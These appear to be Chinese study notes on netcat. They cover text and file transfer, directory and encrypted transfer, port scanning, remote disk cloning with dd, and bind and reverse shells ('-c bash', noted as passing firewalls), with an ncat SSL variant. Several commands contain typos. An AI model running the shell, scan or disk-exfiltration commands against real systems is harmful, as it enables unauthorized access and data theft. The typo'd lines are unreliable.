nc使用详解

使用nc进行通信 传输文本信息
A:nc -l -p 4444(接收端)
B:nc -nv 1.1.1.1 4444 (发送端)

可以用于 电子取证的nc侦听

侦听导出重定向的文件:
A: nc -l -p 4444 > ps.txt(接收端)
B: ps aux | nc -nv 1.1.1.1 4444 -q 1 (发送端)

传输文件:
A: nc -lp 333 > 2.mp4 (接收端)
B: nc -nv 1.1.1.1 333 < a.mp4 (发送端)

等别人来下载
A: nc -lp 333 < 2.mp4 -q 1 (发送端) B: nc -nv 1.1.1.1 444 > 2.mp4 (接收端)

传输目录
A: tar -cvf music/ | nv -lp 333 -q 1 (发送端)
B: nc -nv 1.1.1.1 333 | tar -xvf –

加密传文件
A: nc -lp 333 | mcrypt –flush -Fbqd -a rijn dael-256 -m ecb > 1.mp4 (接收端)
B: mcrypt -flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
(发送端)

NC 端口扫描
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024

NC 远程克隆硬盘
A: nc -lp 333 | dd of = /dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

NC bash命令控制 (正向)
A: nc -lp 333 -c bash (被控制端)
B: nc -nv 1.1.1.1 333 (控制端)

NC bash命令控制 (反向) (过防火墙)
A: nc -lp 333 (控制端)
B: nc -nv 1.1.1.1 333 -c bash (被控制端)

(在windows下,把bash改成cmd)
/etc/init.d
update -rc.d

NC NCAT (实操失败,ncat安装问题)(这个是有加密的,嗅探不到)
nc缺乏加密和身份验证的能力
ncat包含于nmap工具包中
A: ncat nact -c bash –allow 1.1.1.1 -vnl 333 –ssl
B: ncat -nv 1.1.1.1 333 –ssl
不同系统/平台的nc参数功能不尽相同